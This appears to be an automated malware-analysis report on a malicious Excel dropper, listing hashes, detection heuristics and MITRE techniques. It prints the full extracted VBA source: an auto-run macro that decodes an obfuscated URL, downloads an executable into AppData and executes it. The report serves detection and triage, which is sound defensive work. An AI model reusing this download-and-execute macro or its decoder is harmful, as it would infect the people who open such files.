Xls.Dropper.Agent-7776231-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 042359241a3a3f4d…

MALICIOUS

Office (OLE)

71.0 KB Created: 2020-05-08 08:52:42 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: ab7f3692e88e298ccb4a9d4355e1f04b SHA-1: 2bd349c684a2d54602424d91f968467fd029616f SHA-256: 042359241a3a3f4d635527751c2268cc80121586dc68c9a6732edb20d25ce760
276 Risk Score

Malware Insights

Xls.Dropper.Agent-7776231-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that executes code. This code uses the URLDownloadToFile API to download a second-stage payload from a URL constructed from obfuscated strings and saves it to the AppData directory. The macro also references ShellExecuteA, indicating an intent to execute the downloaded file. The document body contains a lure to 'enable content' to view a transaction receipt, further supporting its role as a dropper.

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-7776231-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7776231-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function xstrwib Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal iLnXosvmLoTDzoIy As Long, ByVal pDNwwjV As String, _
    ByVal wSguctfj As String, ByVal IxuoGDZwUbWimA As Long, ByVal VXhql As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx = GJCgcgjggcCc("fyf/fyss")
    JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx = Environ$("AppData") & "\" & GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13484 bytes
SHA-256: 8b455a43231021b6664cadca3d26e079cc996db75dfa1b5c9cced5c0db8566b2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Frinm()

End Sub

Attribute VB_Name = "WilGhnMkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function xbFplZu Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal Ofx As Long, ByVal RlfUAJ As String, _
ByVal JHMyrydpp As String, ByVal EILDcrkT As String, ByVal BEYBF As String, ByVal TezMz As Long) As Long

Private Declare PtrSafe Function xstrwib Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal iLnXosvmLoTDzoIy As Long, ByVal pDNwwjV As String, _
ByVal wSguctfj As String, ByVal IxuoGDZwUbWimA As Long, ByVal VXhql As Long) As Long

Private Sub TuZyYpYcV()
Dim ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv As String
Dim GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx As String
Dim JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx As String
Dim GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV As String
Dim MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh As String
Dim UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh As String
GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx = GJCgcgjggcCc("fyf/fyss")
JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx = Environ$("AppData") & "\" & GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx


ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv = GJCgcgjggcCc("fyf/KLKOLEDWIHIIZUX0F[OPSC0mq/{jc/eqvujyjnfmjo/xxx00;tquui")

xstrwib 0, ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv, JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx, 0, 0
xbFplZu 0, "open", JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx, "", vbNullString, vbNormalFocus
End Sub

Private Sub Workbook_Open()

TuZyYpYcV
End Sub

Public Function JHBMMBHJvhvhvVFfhFDDD3333333reedd(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 642.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 564.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = vbNullString
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
Public Function HJvhvhvVFfhFDDD3333333reedd(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 42.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 64.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 89.252 Then
Dim flamesight As Byte
flamesight = 112.797
Dim sweartrust As Long
sweartrust = 35.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function

Private Function GJCgcgjggcCc(enc)
    Dim x, v, AppData
    enc = StrReverse(enc)
    For v = 1 To Len(enc)
        x = Mid(enc, v, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    GJCgcgjggcCc = AppData
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_f8a1t7q1
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 952 bytes
' Line #0:
' 	FuncDefn (Sub RlfUAJ())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/WilGhnMkbook - 7837 bytes
' Line #0:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function EILDcrkT Lib "wSguctfj" (ByVal BEYBF As Long, ByVal TezMz As String, ByVal shell32.dll As String, ByVal xstrwib As String, ByVal iLnXosvmLoTDzoIy As String, ByVal pDNwwjV As Long) As Long)
' Line #1:
' Line #2:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function IxuoGDZwUbWimA Lib "JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx" (ByVal VXhql As Long, ByVal urlmon As String, ByVal TuZyYpYcV As String, ByVal ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv As Long, ByVal GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx As Long) As Long)
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV())
' Line #5:
' 	Dim 
' 	VarDefn MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh (As String)
' Line #6:
' 	Dim 
' 	VarDefn UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh (As String)
' Line #7:
' 	Dim 
' 	VarDefn GJCgcgjggcCc (As String)
' Line #8:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #9:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #10:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #11:
' 	LitStr 0x0008 "fyf/fyss"
' 	ArgsLd Workbook_Open 0x0001 
' 	St UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh 
' Line #12:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd Sheet1$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh 
' 	Concat 
' 	St GJCgcgjggcCc 
' Line #13:
' Line #14:
' Line #15:
' 	LitStr 0x003A "fyf/KLKOLEDWIHIIZUX0F[OPSC0mq/{jc/eqvujyjnfmjo/xxx00;tquui"
' 	ArgsLd Workbook_Open 0x0001 
' 	St MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh 
' Line #16:
' Line #17:
' 	LitDI2 0x0000 
' 	Ld MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh 
' 	Ld GJCgcgjggcCc 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall IxuoGDZwUbWimA 0x0005 
' Line #18:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld GJCgcgjggcCc 
' 	LitStr 0x0000 ""
' 	Ld Sheet2 
' 	Ld Sheet3 
' 	ArgsCall EILDcrkT 0x0006 
' Line #19:
' 	EndSub 
' Line #20:
' Line #21:
' 	FuncDefn (Private Sub Workbook())
' Line #22:
' Line #23:
' 	ArgsCall GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV 0x0000 
' Line #24:
' 	EndSub 
' Line #25:
' Line #26:
' 	FuncDefn (Public Function be3a8c1f30f1abadd648e22b16fdb57d5(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #27:
' 	LitStr 0x0001 "*"
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	Concat 
' 	LitStr 0x0001 "*"
' 	Concat 
' 	St t0ea0a0840384a15e019665b2e996b73f 
' Line #28:
' 	Dim 
' 	VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #29:
' 	LitR8 0xEF9E 0xC6A7 0x114B 0x4084 
' 	St dhmpmrvyvrxwv 
' Line #30:
' 	Dim 
' 	VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #31:
' 	LitR8 0x353F 0xBA5E 0xAFCD 0x40E5 
' 	St m974e3e334b64ac13b6dec997fbabf21f 
' Line #32:
' 	Dim 
' 	VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #33:
' 	LitR8 0x8312 0xCAC0 0xA7A1 0x4081 
' 	St b08576ffe41cb67690655f1261f410844 
' Line #34:
' 	Dim 
' 	VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #35:
' 	LitR8 0xB852 0x851E 0xF8EB 0x408B 
' 	St z2c55929d38494d4bf3ab6ba3dd16305c 
' Line #36:
' 	Ld Sheet2 
' 	St b9d76f7072ca3da29e82e55579143fba0 
' Line #37:
' 	Dim 
' 	VarDefn kqeepfyakmzwuediw (As String)
' Line #38:
' 	LitStr 0x000B "naiveremove"
' 	St kqeepfyakmzwuediw 
' Line #39:
' 	Dim 
' 	VarDefn flamesight (As Byte)
' Line #40:
' 	LitR8 0x3127 0xAC08 0x3A1C 0x4033 
' 	St flamesight 
' Line #41:
' 	Dim 
' 	VarDefn sweartrust (As Boolean)
' Line #42:
' 	LitR8 0xE560 0x22D0 0x79DB 0x4057 
' 	St sweartrust 
' Line #43:
' 	Dim 
' 	VarDefn prqhhqrabc (As Double)
' Line #44:
' 	LitR8 0x7CEE 0x353F 0x2A5E 0x405B 
' 	St prqhhqrabc 
' Line #45:
' 	Ld columnwall 
' 	Ld t0ea0a0840384a15e019665b2e996b73f 
' 	Like 
' 	Not 
' 	IfBlock 
' Line #46:
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	St b9d76f7072ca3da29e82e55579143fba0 
' Line #47:
' 	Dim 
' 	VarDefn HJvhvhvVFfhFDDD3333333reedd (As Double)
' Line #48:
' 	LitR8 0x2B02 0x1687 0xBED9 0x404E 
' 	St HJvhvhvVFfhFDDD3333333reedd 
' Line #49:
' 	Ld HJvhvhvVFfhFDDD3333333reedd 
' 	LitR8 0xD2F2 0x624D 0xA810 0x4067 
' 	Ne 
' 	IfBlock 
' Line #50:
' 	Dim 
' 	VarDefn enc (As Byte)
' Line #51:
' 	LitR8 0xDD2F 0x0624 0x9981 0x406A 
' 	St enc 
' Line #52:
' 	Dim 
' 	VarDefn x (As Long)
' Line #53:
' 	LitR8 0xAC08 0x5A1C 0x7F64 0x406D 
' 	St x 
' Line #54:
' 	Dim 
' 	VarDefn n (As String)
' Line #55:
' 	LitStr 0x000C "fadzjgdilazu"
' 	St n 
' Line #56:
' 	EndIfBlock 
' Line #57:
' 	EndFunc 
' Line #58:
' 	FuncDefn (Public Function AppData(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #59:
' 	LitStr 0x0001 "*"
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	Concat 
' 	LitStr 0x0001 "*"
' 	Concat 
' 	St t0ea0a0840384a15e019665b2e996b73f 
' Line #60:
' 	Dim 
' 	VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #61:
' 	LitR8 0xF9DB 0x6A7E 0x14BC 0x4045 
' 	St dhmpmrvyvrxwv 
' Line #62:
' 	Dim 
' 	VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #63:
' 	LitR8 0x353F 0xBA5E 0xAFCD 0x40E5 
' 	St m974e3e334b64ac13b6dec997fbabf21f 
' Line #64:
' 	Dim 
' 	VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #65:
' 	LitR8 0x1893 0x5604 0x3D0E 0x4050 
' 	St b08576ffe41cb67690655f1261f410844 
' Line #66:
' 	Dim 
' 	VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #67:
' 	LitR8 0xB852 0x851E 0xF8EB 0x408B 
' 	St z2c55929d38494d4bf3ab6ba3dd16305c 
' Line #68:
' 	LitStr 0x0000 ""
' 	St b9d76f7072ca3da29e82e55579143fba0 
' Line #69:
' 	Dim 
' 	VarDefn kqeepfyakmzwuediw (As String)
' Line #70:
' 	LitStr 0x000B "naiveremove"
' 	St kqeepfyakmzwuediw 
' Line #71:
' 	Dim 
' 	VarDefn flamesight (As Byte)
' Line #72:
' 	LitR8 0x3127 0xAC08 0x3A1C 0x4033 
' 	St flamesight 
' Line #73:
' 	Dim 
' 	VarDefn sweartrust (As Boolean)
' Line #74:
' 	LitR8 0xE560 0x22D0 0x79DB 0x4057 
' 	St sweartrust 
' Line #75:
' 	Dim 
' 	VarDefn prqhhqrabc (As Double)
' Line #76:
' 	LitR8 0x7CEE 0x353F 0x2A5E 0x405B 
' 	St prqhhqrabc 
' Line #77:
' 	Ld columnwall 
' 	Ld t0ea0a0840384a15e019665b2e996b73f 
' 	Like 
' 	Not 
' 	IfBlock 
' Line #78:
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	St b9d76f7072ca3da29e82e55579143fba0 
' Line #79:
' 	Dim 
' 	VarDefn HJvhvhvVFfhFDDD3333333reedd (As Double)
' Line #80:
' 	LitR8 0x2B02 0x1687 0xBED9 0x404E 
' 	St HJvhvhvVFfhFDDD3333333reedd 
' Line #81:
' 	Ld HJvhvhvVFfhFDDD3333333reedd 
' 	LitR8 0xA5E3 0xC49B 0x5020 0x4056 
' 	Ne 
' 	IfBlock 
' Line #82:
' 	Dim 
' 	VarDefn enc (As Byte)
' Line #83:
' 	LitR8 0xBA5E 0x0C49 0x3302 0x405C 
' 	St enc 
' Line #84:
' 	Dim 
' 	VarDefn x (As Long)
' Line #85:
' 	LitR8 0xB021 0x6872 0xFD91 0x4041 
' 	St x 
' Line #86:
' 	Dim 
' 	VarDefn n (As String)
' Line #87:
' 	LitStr 0x000C "fadzjgdilazu"
' 	St n 
' Line #88:
' 	EndIfBlock 
' Line #89:
' 	EndFunc 
' Line #90:
' Line #91:
' 	FuncDefn (Private Function Workbook_Open(StrReverse, id_FFFE As Variant))
' Line #92:
' 	Dim 
' 	VarDefn Chr
' 	VarDefn id_029A
' 	VarDefn v
' Line #93:
' 	Ld StrReverse 
' 	ArgsLd id_0294 0x0001 
' 	St StrReverse 
' Line #94:
' 	StartForVariable 
' 	Ld id_029A 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StrReverse 
' 	FnLen 
' 	For 
' Line #95:
' 	Ld StrReverse 
' 	Ld id_029A 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St Chr 
' Line #96:
' 	Ld v 
' 	Ld Chr 
' 	ArgsLd id_0298 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd id_0296 0x0001 
' 	Concat 
' 	St v 
' Line #97:
' 	StartForVariable 
' 	Next 
' Line #98:
' 	Ld v 
' 	St Workbook_Open 
' Line #99:
' 	EndFunc 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes